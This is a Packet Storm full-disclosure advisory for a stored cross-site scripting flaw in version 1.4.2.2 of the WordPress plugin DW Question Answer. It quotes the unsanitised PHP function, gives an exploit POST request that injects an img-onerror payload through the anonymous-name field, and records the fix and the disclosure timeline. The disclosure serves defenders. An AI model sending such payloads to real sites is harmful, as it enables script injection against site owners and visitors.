WordPress DW Question Answer 1.4.2.2 Cross Site Scripting

2016-03-12T00:00:00
ID PACKETSTORM:136225
Type packetstorm
Reporter Rahul Pratap Singh
Modified 2016-03-12T00:00:00

Description

                                        
                                            `## FULL DISCLOSURE  
  
#Product : DW Question Answer  
#Exploit Author : Rahul Pratap Singh  
#Version : 1.4.2.2  
#Home page Link : https://wordpress.org/plugins/dw-question-answer/  
#Website : 0x62626262.wordpress.com  
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94  
#Date : 11/3/2016  
  
XSS Vulnerability:  
  
----------------------------------------  
Description:  
----------------------------------------  
"_dwqa_anonymous_name" parameter is not sanitized that leads to Stored XSS.  
  
----------------------------------------  
Vulnerable Code:  
----------------------------------------  
  
User.php  
  
function dwqa_get_author( $post_id = false ) {  
if ( !$post_id ) {  
$post_id = get_the_ID();  
}  
  
$display_name = false;  
if ( dwqa_is_anonymous( $post_id ) ) {  
$anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );  
if ( $anonymous_name ) {  
$display_name = $anonymous_name;  
} else {  
$display_name = __( 'Anonymous', 'dwqa' );  
}  
} else {  
$user_id = get_post_field( 'post_author', $post_id );  
$display_name = get_the_author_meta( 'display_name', $user_id );  
}  
  
return apply_filters( 'dwqa_get_author', $display_name, $post_id );  
}  
----------------------------------------  
Exploit:  
----------------------------------------  
  
POST /index.php/dwqa-ask-question/ HTTP/1.1  
  
question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=  
abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+  
onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=  
3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit  
  
----------------------------------------  
POC:  
----------------------------------------  
https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png  
  
Fix:  
Update to 1.4.2.3  
  
Vulnerability Disclosure Timeline:  
→ March 3, 2016 – Bug discovered, initial report to WordPress  
→ March 7, 2016 – No response, Report sent again.  
→ March 8, 2016 – WordPress response, plugin taken down  
→ March 11, 2016 – Vendor deployed a patch  
  
#######################################  
# CTG SECURITY SOLUTIONS #  
# www.ctgsecuritysolutions.com #  
#######################################  
  
Pub Ref:  
https://wordpress.org/plugins/dw-question-answer/changelog/  
  
`